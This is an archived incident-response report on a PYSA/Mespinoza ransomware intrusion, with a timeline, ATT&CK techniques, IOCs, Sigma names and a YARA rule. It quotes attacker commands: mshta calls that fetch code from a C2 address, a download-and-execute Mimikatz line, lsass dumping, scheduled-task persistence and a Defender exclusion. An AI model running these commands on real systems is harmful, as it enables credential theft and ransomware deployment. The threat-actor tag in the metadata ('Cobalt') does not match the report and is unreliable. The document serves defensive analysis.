{
	"id": "9a533194-1b55-43d8-83b2-c63ca595ebd9",
	"created_at": "2026-04-06T00:07:29.966834Z",
	"updated_at": "2026-04-10T03:24:24.413103Z",
	"deleted_at": null,
	"sha1_hash": "6f96e418062deb99420360f9b5a69a30067da8e4",
	"title": "PYSA/Mespinoza Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1150690,
	"plain_text": "PYSA/Mespinoza Ransomware\r\nBy editor\r\nPublished: 2020-11-23 · Archived: 2026-04-05 14:34:48 UTC\r\nIntro\r\nOver the course of 8 hours the PYSA/Mespinoza threat actors used Empire and Koadic as well as RDP to move\r\nlaterally throughout the environment, grabbing credentials from as many systems as possible on the way to their\r\nobjective. The threat actors took their time, looking for files and reviewing the backup server before executing\r\nransomware on all systems. Hours after being ransomed, our files were opened from multiple Tor exit nodes,\r\nwhich confirms our suspicion that files had been exfiltrated. PYSA/Mespinoza seemed to make its big splash\r\nwhen CERT-FR published a report on intrusions back in March 2020. This group has been in business going back\r\nas far as 2018 but recently the group seems to be picking up pace as one of the up and coming big game hunters as\r\nnoted in Intel 471’s recent report.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: 20+ private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver,\r\netc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor\r\nInsights reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nCase Summary\r\nIn this intrusion the entry was a Windows host with RDP exposed to the internet. The threat actors logged in with\r\na valid account (Domain Administrator). The login was from a Tor exit node and over the course of an 8 hour\r\nintrusion we saw them hand off 2 times, for a total of 3 different Tor exits being used to maintain RDP access to\r\nthe environment. The account used to access the first beachhead host had enough privileges to immediately begin\r\nlateral movement to a domain controller just minutes after entry. Network scanning begun on the domain\r\ncontroller followed closely by Empire. While the Empire C2 remained active during the whole intrusion, we saw\r\nlittle activity from it, more like a fallback channel should their RDP access fall off. As they started to move\r\nlaterally to other systems, it was very obvious they were following a checklist playbook. Each time they pivoted,\r\nthey would check quser, and then dump lsass using Task Manager. During the intrusion we saw the PYSA threat\r\nactors attempt to access credentials via the following techniques::\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 1 of 18\n\nDump lsass with Taskmanager\r\nDump lsass with Procdump\r\nDump lsass with comsvcs.dll\r\nDump credentials with Invoke-Mimikatz\r\nExtract the shadow copy of the ntds.dit from the domain controller\r\nExtract and decode backup system credentials from a SQL database\r\nAccess LSA Secrets\r\nMost lateral movement in the environment was via RDP with various legitimate user accounts, as well as PsExec\r\nto execute scripts throughout the environment for credential dumping and collection activity. The threat actor\r\ndisabled security tools throughout the intrusion by using Local Security Policy Editor and MpPreference to disable\r\nDefender. PowerShell Remoting was also used to run the arp command on a few systems. Besides using RDP and\r\nEmpire the group also used the Offensive Security Tool (OST) Koadic, which bills itself as a post exploitation\r\ntoolkit that can stay resident in memory using JScript or VBS via Windows Script Host to perform its execution.\r\nKoadic was only utilized on a few key servers and one of those servers included a persistence mechanism using\r\nthe default Koadic HTA scheduled task module. After around 7 hours post initial access, the threat actors began\r\ntheir final actions by RDPing into systems, dropping a PowerShell script and the ransomware executable. The\r\nPowerShell script killed various active processes and made sure RDP was open at the firewall and created what\r\nappears to be a potentially unique identifier for systems. After that, the ransom would be run to encrypt the\r\nsystem. After the encryption was done we were able to confirm exfiltration occurring by receiving a callback from\r\na canary document. The threat actors asked for 5 BTC or around $88,000 USD which tells us these attackers most\r\nlikely base their ransom demand on the information exfiltrated.\r\nTimeline\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 2 of 18\n\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 3 of 18\n\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access for this actor was via exposed RDP services. Originally, the actor connected from 198.96.155.3, and\r\nthen performed a kind of hand off over the course of the campaign, first to 23.129.64.190 and then finally\r\n185.220.100.240. All 3 of these IP’s belong to the Tor network and function as exit nodes.\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 4 of 18\n\nExecution\r\nThe threat actors started off by using RDP but also relied on 2 different OSTs during this intrusion. A few minutes\r\nafter gaining access, they moved laterally to a domain controller and then executed a PowerShell launcher for\r\nEmpire.\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 5 of 18\n\nLater during the intrusion, the threat actors employed another OST named Koadic. To execute Koadic, they\r\nemployed a MSHTA launcher with javascript.\r\nmshta http://45.147.231.210:9999/8k6Mq\r\nmshta http://45.147.231.210:9999/VtgyT\r\nFrom those two executions, various child processes were created to load stage 2 into memory.\r\nPersistence\r\nPersistence was setup using Koadic to schedule a task to execute a HTA file located in the C:\\ProgramData\r\ndirectory at logon as system. This will initiate C2 back to the Koadic server.\r\nschtasks /create /tn K0adic /tr \"C:\\Windows\\system32\\mshta.exe C:\\ProgramData\\SZWXNUHHDP.hta\" /sc onl\r\nDefense Evasion\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 6 of 18\n\nThe threat actors disabled Windows Defender using Local Group Policy Editor.\r\nLater, they also ran a PowerShell script that would again disable Windows Defender, this time using\r\nMpPreference. The script also targeted Malwarebytes, agents, Citrix, Exchange, Veeam, SQL and many other\r\nprocesses. Event ID 5001 was created due to Defender AV Real-Time being disabled.\r\nA Defender exclusion was also added to exclude everything with .exe as the extension.\r\nAdd-MpPreference -ExclusionExtension \".exe\"\r\nEvent ID 5007\r\nWindows Defender Antivirus Configuration has changed. If this is an unexpected event you should revie\r\nOld value:\r\nNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\.exe = 0x0\r\nCredential Access\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 7 of 18\n\nThe threat actors displayed multiple techniques for gathering credentials during this intrusion. Credentials were\r\ndumped manually via Task Manager as they RDPed into each system.\r\nWhile established on a domain controller the threat actors also created and accessed a shadow copy of the ntds.dit\r\nand most likely exfiltrated it via their Koadic C2 channel.\r\nEvent ID 1917 (The shadow copy backup for Active Directory Domain Services was successful) was logged to the\r\nDirectory Service event log on the domain controller. The threat actors also executed a PowerShell script across\r\nthe environment using PsExec that took advantage of comsvcs.dll to dump the lsass process and then copy the\r\ndump back to their pivot position on a domain controller.\r\nThe threat actors tried using the Sysinternals ProcDump method but the executable was not present on the\r\nendpoint.\r\nprocdump.exe -accepteula -ma lsass.exe mem.dmp\r\nThe threat actors were focused on the backup server for quite awhile as they dumped credentials from the 3rd\r\nparty backup software repository. The first script pulls the hashes out of the database and the second decodes the\r\npassword to plain text. Both scripts were run via PowerShell ISE.\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 8 of 18\n\nThe threat actors also ran Invoke-Mimikatz from BC-Security on one of the domain controllers.\r\nIEX (New-Object Net.WebClient).DownloadString(\" https://raw.githubusercontent.com/BC-SECURITY/Empire/master/da\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 9 of 18\n\nWe also saw the threat actors save LSA Secrets to disk using the hashdump_sam module in Koadic which runs\r\nimpacket.\r\nInveigh was run on a domain controller.\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 10 of 18\n\nDiscovery\r\nThe threat actors leveraged many built-in Windows tools for discovery including the following:\r\nquser.exe\r\nwhoami.exe /user\r\nnet.exe group /domain\r\nnet.exe group \"Domain Users\" /domain\r\nnltest.exe /dclist:\r\narp -a\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 11 of 18\n\nThe arp command was run using PowerShell Remoting.\r\nThey also reviewed a few admin tools while exploring the network including:\r\nmmc.exe C:\\Windows\\system32\\dnsmgmt.msc\r\nmmc.exe C:\\Windows\\system32\\domain.msc\r\nmmc.exe C:\\Windows\\system32\\compmgmt.msc /s\r\nmmc.exe C:\\Windows\\system32\\gpedit.msc\r\nmmc.exe C:\\Windows\\system32\\diskmgmt.msc\r\nmmc.exe C:\\Windows\\system32\\wbadmin.msc\r\nveeam.backup.shell.exe\r\nThe threat actors also brought some tools of their own to aid in discovery tasks including Advanced Port Scanner\r\nand ADRecon. Here’s the description of ADRecon.\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 12 of 18\n\nOther local discovery was performed using PowerShell such as ps to list the running process on systems.\r\nLateral Movement\r\nThe first lateral movement occurred just 3 minutes after the initial access by the threat actor. RDP was initiated\r\nfrom the beachhead host to a domain controller using the valid account they had used to gain access to the first\r\nhost. RDP continued to be the first method of choice while accessing various systems around the environment.\r\nAfter a few hours in, the threat actors decided to automate some credential collection and used PsExec to execute\r\na PowerShell script that called comsvcs.dll for lsass dumping.\r\nPsExec.exe -d \\\\HOST -u \"DOMAIN\\USER\" -p \"PASSWORD\" -accepteula -s cmd /c \"powershell.exe -ExecutionP\r\nCommand and Control\r\nThe threat actors used 3 different C2 channels, RDP, PowerShell Empire, and Koadic. IP’s used to maintain access\r\nover RDP\r\n198.96.155.3\r\n23.129.64.190\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 13 of 18\n\n185.220.100.240\r\nEmpire\r\n194.36.190.74:443\r\nCertificate [b8:20:c2:db:b6:b8:f4:0f:61:a5:c0:27:40:89:e6:30:cd:db:05:5e ]\r\nNot Before 2020/09/17 18:38:42\r\nNot After 2021/09/17 18:38:42\r\nPublic Algorithm rsaEncryption\r\nJA3: 5e12c14bda47ac941fc4e8e80d0e536f\r\nJA3s: 0eec924176fb005dfa419c80ab72d27c\r\nKoadic 45.147.231.210:9999 C2 Check-in\r\n Command\r\nexecution\r\nExfiltration\r\nWhile no plain text exfiltration was seen during this intrusion, canary documents were opened by the threat actors\r\nhours after the ransom, confirming that the hours spent on network before ransoming was used to gather files. The\r\nsource IP’s from these canary documents were also Tor exit nodes just like the RDP connections. Since no\r\nplaintext exfil was observed we assess that the exfiltration was performed via one of the command and control\r\nchannels either RDP, Empire, or Koadic.\r\nImpact\r\nAround the 7.5 hour mark the threat actors began ransom deployment. Two files were dropped via RDP on each\r\nsystem, a PowerShell script and a PYSA ransomware executable.\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 14 of 18\n\nC:\\Users\\USER\\Downloads\\svchost.exe\r\nC:\\Users\\USER\\Downloads\\p.ps1\r\nThe purpose of the PowerShell script was to disable security tools that might not have been disabled through-out\r\nthe intrusion. Additionally, the script would kill many server and database processes allowing encryption of the\r\nfiles that might otherwise be locked by running processes.\r\nFinally, the ransomware exe was executed and the systems ransomed.\r\nEnjoy our report? Please consider donating $1 or more to the project using Patreon. Thank you for your support!\r\nWe also have pcaps, files, memory images, and Kape packages available here.\r\nIOCs\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 15 of 18\n\nMISP Priv https://misppriv.circl.lu/events/view/81105 OTX\r\nhttps://otx.alienvault.com/pulse/5fbb23c7dfc6aa0ffd92d27f\r\nNetwork\r\n198.96.155.3\r\n23.129.64.190\r\n185.220.100.240\r\nhttp://45.147.231.210:9999/8k6Mq\r\nhttp://45.147.231.210:9999/VtgyT\r\n45.147.231.210\r\n194.36.190.74\r\nhttps://194.36.190.74\r\nFile\r\nsvchost.exe\r\nbd395971a7eb344673de513a15c16098\r\n1db448b0f1adf39874d6ea6b245b9623849f48e5\r\ndf0cd6a8a67385ba67f9017a78d6582db422a137160176c2c5c3640b482b4a6c\r\np.ps1\r\n2df8d3581274a364c6bf8859c9bdc034\r\n8af4bfcef0f3fefae3f33b86815a6f940b64f4b7\r\neb1d0acd250d32e16fbfb04204501211ba2a80e34b7ec6260440b7d563410def\r\np.ps1\r\n1da1f49900268fa7d783feda8849e496\r\n72f2352eab5cb0357bdf5950c1d0374a19cfdf99\r\n0ab8f14e2c1e6f7c4dfa3d697d935d4fbef3605e15fd0d489d39b7f82c84ba7e\r\nXEKFGUIQQB.hta\r\n5266daf58dd34076e447474c7dce09b2\r\nb0197a53a56939d3d9006df448bc46ef599bac31\r\n81e0d5945ab7374caf2353f8d019873c88728a6c289884a723321b8a21df3c77\r\nDetections\r\nNetwork\r\nETPRO TROJAN Win32/Koadic CnC Checkin\r\nETPRO TROJAN Koadic Command Execution via CnC\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY Outbound MSSQL Connection to Non-Standard Port - Likely Malware\r\nET SCAN NMAP SIP Version Detect OPTIONS Scan\r\nET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)\r\nGPL SNMP public access udp\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 16 of 18\n\nET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET SCAN Potential SSH Scan OUTBOUND\r\nSigma\r\nwin_hack_koadic win_mshta_spawn_shell win_susp_whoami win_local_system_owner_account_discovery\r\nwin_susp_schtask_creation win_susp_powershell_empire_launch sysmon_susp_vssadmin_ntds_activity\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2020-11-16\r\nIdentifier: Case 1010\r\nReference: https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule mespinoza_svchost {\r\nmeta:\r\ndescription = \"files - svchost.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-11-16\"\r\nhash1 = \"df0cd6a8a67385ba67f9017a78d6582db422a137160176c2c5c3640b482b4a6c\"\r\nstrings:\r\n$s1 = \".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP@@V?$TF_Base@VRandomizedTrapdoorFunction@Crypt\r\n$s2 = \"protonmail.com\" fullword ascii\r\n$s4 = \"update.bat\" fullword ascii\r\n$s5 = \".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$0A@VEnc@Rijndael@CryptoPP@@@C\r\n$s6 = \".?AV?$AlgorithmImpl@VCBC_Encryption@CryptoPP@@V?$CipherModeFinalTemplate_CipherHolder@V?$Block\r\n$s7 = \".?AV?$TF_ObjectImplBase@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@C\r\n$s8 = \".?AV?$TF_ObjectImpl@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@Crypto\r\n$s9 = \".?AV?$TF_EncryptorImpl@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@CryptoP\r\n$s10 = \".?AV?$TF_EncryptorImpl@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@Crypto\r\n$s11 = \".?AV?$TF_ObjectImplBase@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@C\r\n$s12 = \".?AV?$AlgorithmImpl@VTF_EncryptorBase@CryptoPP@@V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@CryptoP\r\n$s13 = \".?AV?$TF_ObjectImpl@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@Crypt\r\n$s14 = \"Check out our website, we just posted there new updates for our partners:\" fullword ascii\r\n$s15 = \"Also, be aware that we downloaded files from your servers and in case of non-payment we will\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 17 of 18\n\n$s16 = \"E3AF7F517600CD3B9006519EA9E24F65CE0318C3F326A20C1C73F644F32C4CDCEE7A398153C29C4B844A7388D6394\r\n$s17 = \"30820220300D06092A864886F70D01010105000382020D003082020802820201009A673A7A8FD521FAE7C950BDFAA\r\n$s18 = \"A76229D9DAD792BF87826DBE0FFED40E7CEE781DF4E8B4AF086E21D41CE0912DAC6252A512B4C81F98E46F1268F7C\r\n$s19 = \"CE012C93EC57B77DB5D9D4C345E7F3A2564C09E728C8B88CCD6A824C070EDDA34DA7082665B0732783868CE38C5F2\r\n$s20 = \": ;+;6;?;E;\" fullword ascii /* hex encoded string 'n' */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"b5e8bd2552848bb7bf2f28228d014742\" or 8 of them )\r\n}\r\nMITRE\r\nExternal Remote Services – T1133 Valid Accounts – T1078 Graphical User Interface – T1061 Mshta – T1218.005\r\nPowerShell – T1059.001 Local Account – T1087.001 Remote System Discovery – T1018 File and Directory\r\nDiscovery – T1083 Domain Trust Discovery – T1482 Account Discovery – T1087 Scheduled Task – T1053.005\r\nLateral Tool Transfer – T1570 SMB/Windows Admin Shares – T1021.002 Remote Desktop Protocol – T1021.001\r\nCredential Dumping – T1003 LSASS Memory – T1003.001 Process Discovery – T1057 Standard Application\r\nLayer Protocol – T1071 Exfiltration Over C2 Channel – T1041 Data Encrypted for Impact – T1486 Rundll32 –\r\nT1218.011 Internal case 1010\r\nSource: https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/"
	],
	"report_names": [
		"pysa-mespinoza-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434049,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f96e418062deb99420360f9b5a69a30067da8e4.pdf",
		"text": "https://archive.orkl.eu/6f96e418062deb99420360f9b5a69a30067da8e4.txt",
		"img": "https://archive.orkl.eu/6f96e418062deb99420360f9b5a69a30067da8e4.jpg"
	}
}